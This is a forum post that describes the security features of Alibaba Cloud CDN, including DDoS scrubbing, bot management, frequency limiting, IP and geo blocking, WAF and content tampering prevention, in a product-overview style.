alisun
Assistant Engineer
Assistant Engineer
  • UID11450
  • Fans0
  • Follows0
  • Posts54
Reads:247Replies:0

Analysis of Alibaba Cloud CDN Security Capabilities

Created#
More Posted time:Jul 16, 2021 23:38 PM
After more than ten years of technical development, Alibaba Cloud CDN has gradually built a secure network protection system that combines edge and cloud features. These features include full-procedure secure transmission, edge defense against common attacks, and enterprise-level dedicated resource deployment, O&M, and content security protection mechanisms. With these features, Alibaba Cloud CDN builds a secure network operation environment for enterprises to enter foreign markets.
Two core scenarios exist for CDN security protection: bandwidth congestion and resource exhaustion.
  • For attack scenarios, such as congestion of limited bandwidth, the traffic needs to be held. CDN is rich in node resources. A distributed network can spread attacks to different edge nodes and send the malicious traffic back to the server after scrubbing.
  • For attack scenarios, such as exhaustion of limited resources, it is necessary to see the attacks quickly and block the corresponding features. CDN alone cannot solve this problem efficiently. Users must configure the CDN node to detect DDoS attacks accurately and schedule the attacks automatically to Anti-DDoS Premium for traffic scrubbing. So, users need to purchase Anti-DDoS Premium.


Edge Security System Based on Alibaba Cloud CDN and Cloud Security


The core of an edge security system built based on Alibaba Cloud CDN is more than acceleration only. Acceleration is the foundation of the overall solution. Relying on Alibaba Cloud Dynamic Route for CDN (DCDN), the acceleration effect of static and dynamic hybrid sites is improved through core technologies, such as automatic static/dynamic separation, intelligent routing, and private protocol transmission.
Based on the acceleration, the system offers customers security capabilities in six aspects: edge application layer security, network layer DDoS defense, content anti-tampering, full-procedure HTTPS transmission, high availability security, and security compliance. The system ensures the security for the entire procedure from the customer's business traffic into the CDN product system and back to the customer's origin server. Thus, it ensures the security acceleration of enterprise Internet businesses.


Edge Security Protection

Alibaba Cloud CDN builds a full set of enterprise-level edge security capabilities, including DDoS mitigation, WAF, frequency control, IP/region blocking, machine traffic management, and precise access control, providing full-stack protection from the network layer to the application layer. This ensures the stability and security of customers' online services without sacrificing the acceleration performance of websites.
Each year, the Alibaba Cloud Security Center detects nearly one million DDoS attacks on the cloud. Application-layer DDoS (CC attacks) has become a common type of attack, with more varied and complex attack methods. Issues related to web application security still account for a large proportion. From the disclosure of user information to consumer carnival, the security level of every industry and every web application is being tested all the time. To increase the security and reliability of network platforms that host data transmission, Alibaba Cloud CDN constantly works to increase its security capabilities.


1. DDoS Mitigation

CDN and Anti-DDoS Premium can be used together to deliver content. When a DDoS attack occurs, the traffic in areas where DDoS attacks occur can be scheduled to Anti-DDoS Premium, which scrubs the traffic and protects the quality of your services effectively. This coordinated solution can effectively scrub high-volume DDoS traffic and defend against flood-type attacks, such as SYN, ACK, ICMP, UDP, NTP, SSDP, and DNS. In addition, based on the computing capabilities and deep learning algorithms of the Alibaba Cloud Apsara platform, intelligent DDoS attack prediction is used to switch traffic over to Anti-DDoS Premium smoothly without affecting business operation.


2. Bot Traffic Management

CDN uses the malicious IP and fingerprint libraries built by Alibaba Group to deal with malicious web crawlers. It uses machine learning capabilities tailored to business risks and customized crawler models to mitigate the impact of web crawlers and automated tools on website businesses. This ensures data security and protects the core business value of enterprises.


3. Frequency Limiting

When the response time of your website is increased due to CC attacks, the frequency limiting feature can block specific requests sent to your website within seconds and improve the security of your website. Frequency limiting protects your website URL from suspicious requests that exceed a set threshold. It supports a wide variety of monitoring objects and is configured with custom rules to define an appropriate access threshold. Once the set request threshold is reached, custom responses are triggered, and frequent access requests are handled through a variety of means, such as blocking or challenging.


4. IP/Geo-Blocking

Alibaba Cloud CDN allows you to configure an IP address blacklist or whitelist to identify and filter users. This helps you control access to CDN resources and improve resource security. You can also use the country blacklist and whitelist to block access requests from specific regions and resolve the highly frequent malicious access requests in some regions.


5. Precise Access Control

Custom match conditions are enabled to implement precise access control. The matching condition can check common HTTP fields, such as IP, URL, and header, to meet the customized requirements of business scenarios. This function describes the access requests to be captured by supporting rich request fields and defining various matching conditions. Once a request is matched, the operations defined in the rule are triggered to achieve precise access control, such as challenging, observing, and blocking.


6. WAF

Due to CDN's distributed architecture, users can obtain content by accessing a nearby edge node, which effectively hides the origin IP address and mitigates the access pressure on the origin server. When large-scale malicious attacks strike, edge nodes can be used as the first line of defense. This disperses the attack intensity and completes edge protection using the preceding security capabilities.
CDN also integrates the cloud WAF capability to implement the last-layer protection for the origin server. WAF performs malicious feature identification and protection on the back-to-origin business traffic. It also forwards normal traffic back to the server to avoid malicious intrusion against the website server, ensure the security of the core data of the enterprise's business, and resolve server performance exceptions caused by malicious attacks. CDN WAF provides virtual patches to fix the latest known website vulnerabilities to the maximum extent. CDN WAF can respond and fix vulnerabilities quickly by relying on cloud security.


Tampering Prevention Capability

CDN provides enterprise-level full-procedure tampering prevention capabilities for HTTPS links and node content to ensure transmission security between the origin server and the client. The HTTPS protocol protects links from being hijacked by intermediate sources, whereas the nodes verify the consistency of the source file. If the content of the source file is deemed inconsistent, the file will be deleted. Then, its original copy will be pulled from the source before being distributed. This complete solution ensures content security on the origin server, links, CDN nodes, and clients, providing higher transmission security.



Exclusive CDN Resources to Improve Enterprise Security

CDN also provides exclusive resources for large enterprises in security-demanding scenarios:
  • CDN allows you to physically isolate secure acceleration nodes and build them independently. It highly integrates security functions and provides single-node, advanced anti-DDoS protection.
  • CDN provides exclusive IP resources to protect your businesses against security risks and prevent the impact of attacks on other users' businesses.
  • CDN supports the independent scheduling of domains by a single user. This means DNS attacks on one user do not affect other users. It allows CDN to defend against DNS Flood-type attacks with millions of QPS.
Guest